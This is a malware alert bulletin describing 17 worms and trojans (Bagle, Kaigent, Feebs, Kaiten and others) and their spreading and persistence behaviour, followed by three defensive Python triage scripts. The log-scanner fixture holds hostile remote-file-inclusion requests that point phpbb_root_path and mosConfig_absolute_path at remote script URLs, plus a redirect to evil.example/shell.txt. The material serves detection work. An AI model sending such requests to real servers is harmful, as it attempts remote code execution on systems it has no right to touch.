[Virus Alert] 17 new worms found
Worm name: WORM_FEEBS.A
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This worm spreads through peer-to-peer (P2P) file-sharing applications. It uses different file names, which are related to various applications, to entice P2P users to download copies of itself.
Upon execution, it drops a copy of itself as MS{Random}.EXE in the Windows system folder. The MS prefix on an otherwise random file name may trick unsuspecting users into thinking that it is a legitimate Windows file.
It disables the Windows Firewall by creating several registry entries. This allows remote malicious users to connect to the affected system and carry out malicious activities without the user's knowledge.
Worm name: WORM_SDBOT.CWG
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This particular WORM_SDBOT variant is Trend Micro's detection for the "Santa worm" malware that is currently spreading in the wild.
It takes advantage of the following Windows vulnerabilities to propagate across networks:
• ASN.1 vulnerability
• Windows Plug and Play vulnerability
The said vulnerabilities are discussed in detail on the following Web pages:
• Microsoft Security Bulletin MS04-007
• Microsoft Security Bulletin MS05-039
Propagation via the Plug and Play vulnerability, however, works only on Windows NT and 2000; the characteristics of that vulnerability prevent the worm from exploiting it on Windows XP and Server 2003.
Upon execution, it drops a copy of itself as WINRPC.EXE in the Windows folder.
Worm name: ELF_KAIGENT.A
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This memory-resident worm is part of a botnet distributor that exploits a known vulnerability in Mambo, an open source content management system commonly run on Linux platforms.
A botnet is a network of computers that are remotely controlled, usually for malicious activities such as spamming or spyware distribution, and usually without the computer owner's knowledge.
The botnet distribution starts when this worm attempts to exploit the Mambo vulnerability. If successful, it downloads a script, detected by Trend Micro as PHP_DEFTOOL.A, which in turn downloads the script micu from the address 209.{BLOCKED}.48.69/micu.
Worm name: SYMBOS_CABIR.M
Risk rating: MEDIUM
Damage Potential: MEDIUM
Distribution Potential: MEDIUM
Description:
This malware propagates via Bluetooth and may also be downloaded from the Internet. It uses the file name Norton Antivirus Symbian v1.0sis to trick unsuspecting users into accepting the file and installing it on their phones.
It infects mobile phones running the Symbian OS with the Series 60 Platform user interface.
Worm name: TROJ_BAGLE.GP
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This memory-resident Trojan arrives on a system as an attachment to the mass-mailed email messages sent by WORM_BAGLE.GP.
Once a user executes the attachment, it drops a copy of itself on the affected machine. The presence of the file ANTI_TROJ.EXE indicates infection.
It looks in the Windows system folder for the legitimate Windows file NTIMAGE.GIF and displays it with the default image viewer, so that running the dropped file appears to do nothing more than open a .GIF file.
Worm name: ELF_MARE.B
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This Linux executable (ELF) propagates by exploiting the PHP-Nuke admin_styles.php phpbb_root_path vulnerability, which allows a malicious user to execute commands remotely on the vulnerable system.
It drops and executes a UNIX script file, detected by Trend Micro as UNIX_MARE.B, on the affected machine. The script then downloads a copy of the worm and another malware program, detected by Trend Micro as ELF_KAITEN.P.
As of this writing, there are no known upgrades, patches, or workarounds for the PHP-Nuke vulnerability.
Worm name: ELF_KAITEN.P
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This Linux executable (ELF) is usually downloaded and executed by another malware program, detected by Trend Micro as UNIX_MARE.B.
Upon execution, it uses an Internet Relay Chat (IRC) client to connect to a specific IRC server and join a particular IRC channel.
It then waits for commands from a remote user, such as terminating processes and downloading files, and carries them out on the machine, compromising system security.
Worm name: WORM_BAGLE.GP
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This worm usually arrives as a file downloaded by TROJ_BAGLE.GP.
Upon execution, it drops a copy of itself as wind2ll2.exe in the Windows system folder and creates registry entries intended to run it at every system startup. However, this autostart mechanism does not work.
It attaches a copy of TROJ_BAGLE.GP to email messages that it sends to addresses found in the affected system's Windows Address Book (WAB). When executed, that Trojan downloads a copy of this worm from several sites.
Worm name: TROJ_BAGLE.GS
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This Trojan usually arrives as a file downloaded by another malware program, which Trend Micro detects as TROJ_BAGLE.GR.
Upon execution, this memory-resident Trojan drops the files WINLOG.EXE and WINLOG.DLL into the Windows system folder.
It terminates processes, disables services, and blocks access to Web sites related to antivirus and security applications. These routines leave the affected system more exposed to infection by other malware.
Worm name: WORM_BAGLE.GY
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This worm usually arrives as a file downloaded by other malware programs. Upon execution, it drops a copy of itself as wind2ll2.exe in the Windows system folder.
It creates registry keys intended to run it at every system startup. However, this autostart mechanism does not work.
It connects to a list of Web sites from which it retrieves files that may download copies of this worm. It also downloads lists of predefined email addresses that it may use as recipients of its email messages.
Worm name: TROJ_BAGLE.GR
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This memory-resident Trojan arrives on a system as an attachment to mass-mailed email messages.
Once a user executes the attachment, it drops a copy of itself on the affected machine. The presence of the file ANTI_TROJ.EXE indicates infection.
It looks in the Windows system folder for the legitimate Windows file NTIMAGE.GIF and displays it with the default image viewer, so that running the dropped file appears to do nothing more than open a .GIF file.
Worm name: ELF_KAIGENT.B
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This Linux executable (ELF) is part of a botnet distributor that exploits the following vulnerabilities:
• AWStats Remote Command Execution vulnerability
• Mambo "mosConfig_absolute_path" Remote File Inclusion vulnerability
A botnet is a network of computers that are remotely controlled, usually for malicious activities such as spamming or spyware distribution, and usually without the computer owner's knowledge.
When either vulnerability is successfully exploited, this ELF attempts to download from the URL http://216.{BLOCKED}09.12/listen. The URL is inaccessible as of this writing.
Worm name: ELF_KAIGENT.C
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This Linux executable (ELF) is part of a botnet distributor that exploits a vulnerability in admin_styles.php which allows a remote attacker to execute arbitrary commands. The script does not properly clean or reset a user's input to the phpbb_root_path variable, so a remote attacker can make it include a file from a remote host that contains arbitrary commands; the vulnerable script then executes those commands.
A botnet is a network of computers that are remotely controlled, usually for malicious activities such as spamming or spyware distribution, and usually without the computer owner's knowledge.
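Added example, not part of the Trend Micro descriptions above: a Python scanner for the kind of remote file inclusion that ELF_MARE.B (admin_styles.php phpbb_root_path) and ELF_KAIGENT.B/C (Mambo mosConfig_absolute_path) rely on. It parses Apache-style access log lines and reports every query parameter whose value is a remote URL, at high severity for the two parameter names these descriptions mention and at medium severity for anything else. The log lines are constructed for the example and use 192.0.2.0/24 documentation addresses rather than the {BLOCKED} hosts above; the AWStats vector is not covered because the page does not name its parameter.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines, not captured traffic. 192.0.2.0/24 is
# documentation address space; the page's own {BLOCKED} addresses are not used.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Jan/2006:02:14:11 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 4312 "-" "Mozilla/4.0"
10.0.0.9 - - [07/Jan/2006:02:15:02 +0000] "GET /forum/admin/admin_styles.php?phpbb_root_path=http://192.0.2.69/micu? HTTP/1.0" 200 83 "-" "-"
10.0.0.9 - - [07/Jan/2006:02:15:04 +0000] "GET /mambo/index.php?option=com_content&mosConfig_absolute_path=http://192.0.2.12/listen? HTTP/1.0" 200 65 "-" "-"
10.0.0.7 - - [07/Jan/2006:02:16:30 +0000] "GET /page.php?redirect=%68%74%74%70%3a%2f%2fevil.example%2fshell.txt HTTP/1.1" 302 0 "-" "curl/7.15"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Parameters the page names as the inclusion points; any other parameter that
# carries a remote URL is reported at lower severity (open redirects look alike).
KNOWN_RFI_PARAMS = {"phpbb_root_path", "mosconfig_absolute_path"}
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.I)


def rfi_findings(line):
    """Suspected RFI parameters in one log line; None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    hits = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            value = unquote(value)  # parse_qs decoded once; this catches double encoding
            if REMOTE_URL.match(value):
                hits.append({
                    "src": m.group("src"),
                    "path": parts.path,
                    "param": name,
                    "value": value,
                    "status": int(m.group("status")),
                    # a 200 on a known parameter means the include most likely ran
                    "severity": "high" if name.lower() in KNOWN_RFI_PARAMS else "medium",
                })
    return hits


def scan(log_text):
    """Scan a whole log; findings come back in file order."""
    findings = []
    for line in log_text.splitlines():
        findings.extend(rfi_findings(line) or [])
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['src']} {f['path']} {f['param']}={f['value']} ({f['status']})")
```

A 200 response on a hit for one of the named parameters should be treated as a probable compromise rather than a probe, because the included file is fetched and executed server-side; the generic medium-severity rule also catches open redirects and needs analyst review.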
Worm name: WORM_BAGLE.BY
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This worm propagates via email. It first downloads, from a number of Web sites, a file containing a list of target recipients, then sends a copy of itself as an attachment to email messages spammed to those recipients.
The contents of the downloaded file may change from time to time. As of this writing, however, the Web sites that this worm attempts to access are all inaccessible.
It listens on TCP port 80 for incoming connections from a remote malicious user. Once a connection is established, it acts as a backdoor that lets the remote user issue commands on the affected machine. Through the same backdoor it can also set up the affected system as a Web server, which a remote user can use to upload or download possibly malicious files.
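Added example, not from the Trend Micro write-ups: a Python triage script for the two network behaviours described on this page, WORM_BAGLE.BY's listener on TCP port 80 and the outbound IRC session of a bot such as ELF_KAITEN.P. It parses `netstat -ano` and `tasklist` output from a hypothetical Windows host, joins the two on PID, and flags a TCP/80 listener owned by anything outside an assumed allowlist of web servers, plus any established connection to the conventional IRC port range 6660-6669 (the page does not state which port KAITEN's server uses, so the range is an assumption; on a Linux host the same rule would be run over `netstat -tanp`). Both outputs and the process name msupdater.exe are constructed for the example.

```python
import re

# Constructed `netstat -ano` and `tasklist` output from a hypothetical Windows XP
# host; msupdater.exe is an invented process name, not an indicator from the page.
NETSTAT_OUT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1844
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    10.0.0.5:1052          192.0.2.10:6667        ESTABLISHED     1844
  TCP    10.0.0.5:1060          192.0.2.20:80          ESTABLISHED     1500
  UDP    0.0.0.0:445            *:*                                    4
"""
TASKLIST_OUT = """\
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0         28 K
svchost.exe                    912 Services                   0      4,324 K
iexplore.exe                  1500 Console                    0     18,004 K
msupdater.exe                 1844 Console                    0      2,048 K
"""

NETSTAT_RE = re.compile(
    r'^\s*(?P<proto>TCP|UDP)\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+'
    r'(?:(?P<state>[A-Z_]+)\s+)?(?P<pid>\d+)\s*$'
)
TASKLIST_RE = re.compile(r'^(?P<image>.+?)\s+(?P<pid>\d+)\s+\S+\s+\d+\s+[\d,]+ K$')

# Assumptions: these are the HTTP servers the site legitimately runs, and the IRC
# server the bot talks to sits in the conventional 6660-6669 port range.
EXPECTED_HTTP_SERVERS = {"inetinfo.exe", "httpd.exe", "apache.exe", "w3wp.exe"}
IRC_PORTS = range(6660, 6670)


def parse_netstat(text):
    """Rows of netstat -ano as dicts; state is None for UDP rows."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            rows.append({"proto": m.group("proto"), "local": m.group("local"),
                         "remote": m.group("remote"), "state": m.group("state"),
                         "pid": int(m.group("pid"))})
    return rows


def parse_tasklist(text):
    """Map PID -> lowercase image name from tasklist output."""
    procs = {}
    for line in text.splitlines():
        m = TASKLIST_RE.match(line)
        if m:
            procs[int(m.group("pid"))] = m.group("image").lower()
    return procs


def port_of(addr):
    """Port from 'host:port' ('*:*' and IPv6 '[::]:80' handled); None if absent."""
    port = addr.rsplit(":", 1)[-1]
    return int(port) if port.isdigit() else None


def triage(conns, procs):
    """Flag unexpected TCP/80 listeners and IRC sessions, with the owning image name."""
    findings = []
    for c in conns:
        if c["proto"] != "TCP":
            continue
        image = procs.get(c["pid"], "<unknown>")
        if (c["state"] == "LISTENING" and port_of(c["local"]) == 80
                and image not in EXPECTED_HTTP_SERVERS):
            findings.append((c["pid"], image, "unexpected listener on TCP/80"))
        if c["state"] == "ESTABLISHED" and port_of(c["remote"]) in IRC_PORTS:
            findings.append((c["pid"], image, f"IRC session to {c['remote']}"))
    return findings


if __name__ == "__main__":
    for pid, image, why in triage(parse_netstat(NETSTAT_OUT), parse_tasklist(TASKLIST_OUT)):
        print(f"PID {pid:>5} {image:<16} {why}")
```

The PID join is what makes the port-80 rule usable: a listener on 80 is normal on a web server, so the decision rests on which image owns the socket, and a non-server image holding it is the backdoor-as-Web-server behaviour described above.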
Worm name: JS_FEEBS.A
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This malicious JavaScript arrives on a system as a file downloaded from the Internet.
When run, it drops the file command.exe, which Trend Micro detects as WORM_FEEBS.A; a system infected with JS_FEEBS.A may therefore also be infected with that worm, compounding the damage.
It creates an autostart registry entry for the dropped file. If it fails to create that entry, it copies command.exe to the startup folder, whose path it retrieves from a specific registry key, and then executes the file.
Copying the file to the startup folder ensures that the dropped malware runs at every system startup.
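Added example, not from the Trend Micro descriptions: a Python triage script over a regedit .reg export, covering the persistence and firewall changes described for JS_FEEBS.A and WORM_FEEBS.A. It parses the Run keys and flags commands whose executable is one of the dropped-file names listed on this page (command.exe, wind2ll2.exe, WINRPC.EXE, WINLOG.EXE, ANTI_TROJ.EXE) or matches the MS{Random}.EXE pattern, and it reports a Windows Firewall profile whose EnableFirewall value is 0. The page says only that the firewall is disabled through "several registry entries"; EnableFirewall under SharedAccess\Parameters\FirewallPolicy\StandardProfile is the standard XP SP2 switch and is used here as the check. The .reg content and the allowlist are constructed for the example.

```python
import re
from pathlib import PureWindowsPath

# Constructed regedit export for a hypothetical infected XP host. The file names
# are the page's indicators; the key paths are the standard Run keys and the
# Windows Firewall standard-profile switch (not named on the page).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMan"="SOUNDMAN.EXE"
"Windows Update"="C:\\WINDOWS\\system32\\MSbkq7a.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"command"="\"C:\\WINDOWS\\system32\\command.exe\" /q"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall"=dword:00000000
'''

KEY_RE = re.compile(r'^\[(?P<key>.+)\]$')
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')
RUN_KEY = re.compile(r'\\CurrentVersion\\Run(Once)?$', re.I)
FIREWALL_KEY = re.compile(r'\\FirewallPolicy\\(Standard|Domain)Profile$', re.I)
MS_RANDOM = re.compile(r'^ms[a-z0-9]{3,}\.exe$', re.I)   # the page's MS{Random}.EXE pattern
# File names the page lists as infection indicators.
DROPPED_NAMES = {"command.exe", "wind2ll2.exe", "winrpc.exe", "winlog.exe", "anti_troj.exe"}
# Assumption: a site allowlist; several genuine Microsoft binaries also start with "ms".
ALLOWLIST = {"msmsgs.exe"}


def parse_reg(text):
    """{key path: {value name: data}} for string (REG_SZ) and dword values."""
    tree, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        km = KEY_RE.match(line)
        if km:
            current = km.group("key")
            tree.setdefault(current, {})
            continue
        vm = VALUE_RE.match(line)
        if vm and current is not None:
            data = vm.group("data")
            if data.startswith('"') and data.endswith('"'):
                data = re.sub(r'\\(.)', r'\1', data[1:-1])   # undo .reg escaping of \ and "
            elif data.lower().startswith("dword:"):
                data = int(data[6:], 16)
            tree[current][vm.group("name")] = data
    return tree


def exe_name(command):
    """Basename of the executable in a Run-key command line (quoted or not)."""
    s = command.strip()
    if s.startswith('"'):
        s = s[1:].split('"', 1)[0]       # quoted path, arguments after the closing quote
    else:
        s = s.split(" ", 1)[0]           # unquoted path, arguments after the first space
    return PureWindowsPath(s).name.lower()


def triage(tree):
    """(key, value name, detail, reason) tuples for autostart and firewall indicators."""
    findings = []
    for key, values in tree.items():
        if RUN_KEY.search(key):
            for name, data in values.items():
                if not isinstance(data, str):
                    continue
                exe = exe_name(data)
                if exe in DROPPED_NAMES:
                    findings.append((key, name, exe, "known dropped-file name"))
                elif MS_RANDOM.match(exe) and exe not in ALLOWLIST:
                    findings.append((key, name, exe, "MS+random name, verify signature"))
        elif FIREWALL_KEY.search(key) and values.get("EnableFirewall") == 0:
            findings.append((key, "EnableFirewall", "0", "Windows Firewall disabled"))
    return findings


if __name__ == "__main__":
    for key, name, detail, reason in triage(parse_reg(SAMPLE_REG)):
        print(f"{reason:<34} {name}={detail}  [{key}]")
```

On a live host the input comes from `reg export` of the two Run keys and the FirewallPolicy key; the MS+random rule is a triage heuristic rather than a verdict, which is why it defers to an allowlist and asks for a signature check instead of declaring the file malicious.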
Worm name: TROJ_BAGLE.GT
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This memory-resident Trojan arrives on a system as an attachment to mass-mailed email messages.
Once a user executes the attachment, it drops a copy of itself on the affected machine. The presence of the file ANTI_TROJ.EXE indicates infection.
It looks in the Windows system folder for the legitimate Windows file NTIMAGE.GIF and displays it with the default image viewer, so that running the dropped file appears to do nothing more than open a .GIF file.
Worm name: WORM_VIRKEL.B
Risk rating: HIGH
Damage Potential: HIGH
Distribution Potential: HIGH
Description:
This memory-resident worm spreads via MSN Messenger by sending an instant message to all online contacts of an affected user. The message contains a link to the following address, with the recipient's email address appended:
msg{BLOCKED}beta8.com/im.php
When a recipient clicks the link, a copy of the worm is downloaded onto the system.
Because the message comes from a known contact, recipients may trust it and unsuspectingly install the worm. Users are advised to be wary of links in instant messages from their contacts unless they have confirmed that the links are valid and non-malicious.
References: http://www.trendmicro.com/vinfo/ (TrendMicro Virus Security Info)
http://www.trendmicro.com/vinfo/zh-tw/default.asp (Traditional Chinese TrendMicro Virus Security Info)